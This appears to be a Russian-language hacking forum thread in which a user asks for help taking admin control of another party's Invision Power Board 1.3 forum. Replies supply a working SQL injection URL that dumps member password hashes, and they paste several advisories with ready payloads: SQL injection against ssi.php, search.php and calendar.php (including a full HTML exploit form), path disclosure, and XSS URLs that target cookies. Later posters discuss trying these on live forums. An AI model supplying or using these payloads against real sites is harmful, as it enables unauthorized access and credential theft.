Всем привет! Срочно очень нужна помощь!!! Есть форум Invision Power Board(U) v1.3 PF1 (именно такой! не путать с бест фалйз!) Нужно удалить на таком форуме раздел, то бишь получить права администратора! Пожалуйста, очень прошу помощи!
Если не стоят патчи, то можно воспользоваться кучей штук. Была какая-то бага которая позваляла выполнить Sql запрос тобишь хеши можно поиметь.
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
************************************* SQL инъекция в Invision Power Board Программа: Invision Power Board 1.3.1 Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может внедрить SQL команды. 'ssi.php' не проверяет данные, представленные пользователем. Пример: http://[target]/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] URL производителя: http://www.invisionboard.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. ********************************** ********************************** Раскрытие инсталляционного пути в Invision Power Board Программа: Invision Power Board 1.3 Final Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость раскрытия информации обнаружена в Invision Power Board. Удаленный авторизованный пользователь может определить инсталляционный путь. Пример/Эксплоит: http://[target]/forum/index.php?act=UserCP&CODE=photo ************************************ Межсайтовый скриптинг в Invision Power Board Программа: Invision Power Board 1.3 Final Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может выполнить XSS нападение. Форум не проверяет правильность данных, представленных пользователем в поле ‘pop’. Пример/Эксплоит: http://<host>/forum//index.php?s=&act=chat&pop=1;'><script>alert('this could be your cookie')</script><plaintext> ******************************* Межсайтовый скриптинг в Invision Power Board Программа: Invision Power Board 1.3 Final Опасность: Низкая Наличие эксплоита: Да Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в Invision Power Board. Удаленный пользователь может выполнить XSS нападение. Параметры 'c', 'f', 'showtopic', 'showuser', и 'username' не фильтруют HTML код, представленный пользователем: http://[target]/?c='><script>alert(window.document.url)</script><plain text> http://[target]/?showtopic='><script>alert(window.document.url)</script><plaintext> http://[target]/?act=SR&f='><script>alert(document.cookie)</script> http://[t arget]/?showuser='><script>alert(document.cookie)</script> http://[target]/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script> URL производителя:http://www.invisionboard.com/ SQL инъекция в Invision Power Board Программа: Invision Power Board все версии Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Invision Board Forum в "sources/search.php". Удаленный пользователь может выполнить произвольный SQL код на основной базе данных. Уязвимый код: if (isset($ibforums->input['st']) ) { $this->first = $ibforums->input['st']; } Пример/Эксплоит: http://www.board.com/forum/index.php?act=S...v=lv&CODE=show& searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/* ********************************* SQL инъекция в Invision Power Board Программа: Invision Power Board 1.3 FINAL Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных. Уязвимость обнаружена в сценарии sources/calendar.php в параметре 'request'. Пример/Эксплоит: <html> <head><title> Invision Power Board Free 1.3 FINAL SQL Injection Problems </title></head> <body> <form action='/index.php?act=calendar' method='post' onsubmit="this.m.value='2 )) UNION '+this.request.value+'#';this.action=this.url.value+this.action;"> <b>IPB directory URL :</b> <input type='text' size='45' name='url' value='http://forum.target.com'><br><br> <b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request' value='SELECT * FROM ibf_calendar_events'><br><br> <u>Attention :</u> The request result MUST have this structure :<br><br> INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT, INT,INT,STR,STR<br><br> <input type='hidden' name='y' value='2004'> <input type='hidden' name='m'> <input type='submit' value='Execute'> </form> <br><br><br> <p align="right">A patch can be found on <a href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br> For more informations about this exploit : <a href="http://www.security-corporation.com/advisories-025.html" target="_blank"> Security-Corporation.com</a></p> </body> </html> URL производителя: http://www.invisionboard.com
Code: SQL инъекция в Invision Power Board Программа: Invision Power Board 1.3.1 Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может внедрить SQL команды. 'ssi.php' не проверяет данные, представленные пользователем. Пример: [url]http://[target]/ssi.php?a=out&type=xml&f=0[/url])[SQL-INJECTION] URL производителя: [url]http://www.invisionboard.com/[/url] Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. что можно сделать с этой sql? напишите пример запроса этого
Ребят, вопрос глупый и нескромный... а эти уязвимрсти на данный момент еще присутствуют? А то руки чешутся на одном форуме опыты провести...
Ну оч мало таких осталось... хотя пару ссыл досих пор работают... но это нада быть полным аленем что бы оставить эти баги